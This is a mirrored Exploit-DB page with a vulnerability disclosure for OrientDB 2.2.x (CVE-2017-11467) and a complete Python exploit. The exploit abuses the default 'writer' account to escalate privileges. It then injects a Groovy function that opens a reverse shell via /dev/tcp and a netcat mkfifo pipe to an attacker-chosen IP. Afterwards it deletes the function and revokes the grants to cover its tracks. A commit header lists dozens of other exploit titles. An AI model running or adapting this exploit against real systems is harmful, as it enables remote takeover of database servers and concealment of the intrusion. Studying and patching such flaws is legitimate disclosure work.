bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/44068.md
Offensive Security e630f8c249 DB: 2018-02-16 
45 changes to exploits/shellcodes

Cisco ASA - Crash PoC
Cisco ASA - Crash (PoC)

GNU binutils 2.26.1 - Integer Overflow (POC)
GNU binutils 2.26.1 - Integer Overflow (PoC)
K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read
Linux Kernel - 'AF_PACKET' Use-After-Free
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service
Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)
Microsoft Edge Chakra JIT - Memory Corruption
Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass
Microsoft Edge Chakra JIT - Array Type Confusion via InitProto Instructions
Microsoft Edge Chakra JIT - 'Array.prototype.reverse' Array Type Confusion
Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion
Microsoft Edge Chakra JIT - 'LdThis' Type Confusion
Pdfium - Pattern Shading Integer Overflows
Pdfium - Out-of-Bounds Read with Shading Pattern Backed by Pattern Colorspace
Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow
Hotspot Shield - Information Disclosure
Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation
Nitro Pro PDF - Multiple Vulnerabilities
Odoo CRM 10.0 - Code Execution
Dashlane - DLL Hijacking

LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation
Trustwave SWG 11.8.0.27 - SSH Unauthorized Access
Ichano AtHome IP Cameras - Multiple Vulnerabilities
Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution
Ikraus Anti Virus 2.16.7 - Remote Code Execution
McAfee Security Scan Plus - Remote Command Execution
OrientDB - Code Execution
360 Total Security - Local Privilege Escalation
HPE Intelligent Management Center (iMC) 7.2 (E0403P10) - Code Execution
Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution
iBall WRA150N - Multiple Vulnerabilities
GitStack - Unauthenticated Remote Code Execution
Monstra CMS - Remote Code Execution
Ametys CMS 4.0.2 - Unauthenticated Password Reset
DblTek - Multiple Vulnerabilities
FiberHome - Directory Traversal
PHP Melody 2.7.3 - Multiple Vulnerabilities
Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure
Horde Groupware 5.2.21 - Unauthorized File Download
QNAP HelpDesk < 1.1.12 - SQL Injection
Hanbanggaoke IP Camera - Arbitrary Password Change
McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution
Sophos XG Firewall 16.05.4 MR-4 - Path Traversal
Cisco DPC3928 Router - Arbitrary File Disclosure
IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities
Geneko Routers - Unauthenticated Path Traversal
Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
2018-02-16 05:01:50 +00:00

8.8 KiB
Raw Blame History

Vulnerability Summary

The following advisory reports a vulnerability in OrientDB which allows users of the product to cause it to execute code.

OrientDB is a Distributed Graph Database engine with the flexibility of a Document Database all in one product. The first and best scalable, high-performance, operational NoSQL database.

Credit

An independent security researcher, Francis Alexander, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.

Vendor response

The vendor has released patches to address this vulnerability and issue CVE-2017-11467. For more information: https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#security.

Vulnerability Details

OrientDB uses RBAC model for authentication schemes. By default an OrientDB has 3 roles admin, writer and reader. These have their usernames same as the role. For each database created on the server, it assigns by default these 3 users.

The privileges of the users are:

admin access to all functions on the database without any limitation reader read-only user. The reader can query any records in the database, but cant modify or delete them. It has no access to internal information, such as the users and roles themselves writer same as the reader, but it can also create, update and delete records ORole structure handles users and their roles and is only accessible by the admin user. OrientDB requires oRole read permissions to allow the user to display the permissions of users and make other queries associated with oRole permissions.

From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order by statements, this permission requirement is not required and information is returned to unprivileged users.

Example:

select * from <em>oRole</em> order by name;

The user writer which is created with every database you create. Thus even if the db admin changes the admin user password, an attacker would still be able to get Code Execution with the writer user.

Since we enable the functions where, fetchplan and order by, and OrientDB has a function where you could execute groovy functions and this groovy wrapper doesnt have a sandbox and exposes system functionalities, we can run any command we want.

Sample Groovy function: Command.md

def command = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081
>/tmp/f'
 File file = new File("hello.sh")
 file.delete()
 file << ("#!/bin/bash\n")
 file << (command)
 def proc = "bash hello.sh".execute()

Proof of Concept

Run Netcat at port 8081

nc -lv 8081

Run the following:

python PoC.py ip [port] // By default uses 2480

PoC.py

import sys
import requests
import json
import string
import random

target = sys.argv[1]

try:
    port = sys.argv[2] if sys.argv[2] else 2480
except:
    port = 2480

url = "http://%s:%s/command/GratefulDeadConcerts/sql/-/20?format=rid,type,version,class,graph"%(target,port)


def random_function_name(size=5, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

def enum_databases(target,port="2480"):

    base_url = "http://%s:%s/listDatabases"%(target,port)
    req = requests.get(base_url)

    if req.status_code == 200:
        #print "[+] Database Enumeration successful"
        database = req.json()['databases']

        return database

    return False

def check_version(target,port="2480"):
    base_url = "http://%s:%s/listDatabases"%(target,port)
    req = requests.get(base_url)

    if req.status_code == 200:

        headers = req.headers['server']
        #print headers
        if "2.2" in headers or "3." in headers:
            return True

    return False

def run_queries(permission,db,content=""):

    databases = enum_databases(target)

    url = "http://%s:%s/command/%s/sql/-/20?format=rid,type,version,class,graph"%(target,port,databases[0])

    priv_enable = ["create","read","update","execute","delete"]
    #query = "GRANT create ON database.class.ouser TO writer"

    for priv in priv_enable:

        if permission == "GRANT":
            query = "GRANT %s ON %s TO writer"%(priv,db)
        else:
            query = "REVOKE %s ON %s FROM writer"%(priv,db)
        req = requests.post(url,data=query,auth=('writer','writer'))
        if req.status_code == 200:
            pass
        else:
            if priv == "execute":
                return True
            return False

    print "[+] %s"%(content)
    return True

def priv_escalation(target,port="2480"):

    print "[+] Checking OrientDB Database version is greater than 2.2"

    if check_version(target,port):

        priv1 = run_queries("GRANT","database.class.ouser","Privilege Escalation done checking enabling operations on database.function")
        priv2 = run_queries("GRANT","database.function","Enabled functional operations on database.function")
        priv3 = run_queries("GRANT","database.systemclusters","Enabling access to system clusters")

        if priv1 and priv2 and priv3:
            return True

    return False

def exploit(target,port="2480"):

    #query = '"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"most","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":null'

    #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"ost","language":"groovy","code":"def command = 'whoami';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":None}

    func_name = random_function_name()

    print func_name

    databases = enum_databases(target)

    reverse_ip = raw_input('Enter the ip to connect back: ')

    query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/'+reverse_ip+'/8081 0>&1\';File file = new File(\\"hello.sh\\");file.delete();file << (\\"#!/bin/bash\\\\n\\");file << (command);def proc = \\"bash hello.sh\\".execute();","parameters":null}'
    #query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 >/tmp/f\' \u000a File file = new File(\"hello.sh\")\u000a     file.delete()       \u000a     file << (\"#!/bin/bash\")\u000a     file << (command)\n    def proc = \"bash hello.sh\".execute() ","parameters":null}'
    #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"lllasd","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute();","parameters":None}
    req = requests.post("http://%s:%s/document/%s/-1:-1"%(target,port,databases[0]),data=query,auth=('writer','writer'))

    if req.status_code == 201:

        #print req.status_code
        #print req.json()

        func_id = req.json()['@rid'].strip("#")
        #print func_id

        print "[+] Exploitation successful, get ready for your shell.Executing %s"%(func_name)

        req = requests.post("http://%s:%s/function/%s/%s"%(target,port,databases[0],func_name),auth=('writer','writer'))
        #print req.status_code
        #print req.text

        if req.status_code == 200:
            print "[+] Open netcat at port 8081.."
        else:
            print "[+] Exploitation failed at last step, try running the script again."
            print req.status_code
            print req.text

        #print "[+] Deleting traces.."

        req = requests.delete("http://%s:%s/document/%s/%s"%(target,port,databases[0],func_id),auth=('writer','writer'))
        priv1 = run_queries("REVOKE","database.class.ouser","Cleaning Up..database.class.ouser")
        priv2 = run_queries("REVOKE","database.function","Cleaning Up..database.function")
        priv3 = run_queries("REVOKE","database.systemclusters","Cleaning Up..database.systemclusters")

        #print req.status_code
        #print req.text

def main():

    target = sys.argv[1]
    #port = sys.argv[1] if sys.argv[1] else 2480
    try:
        port = sys.argv[2] if sys.argv[2] else 2480
        #print port
    except:
        port = 2480
    if priv_escalation(target,port):
        exploit(target,port)
    else:
        print "[+] Target not vulnerable"

main()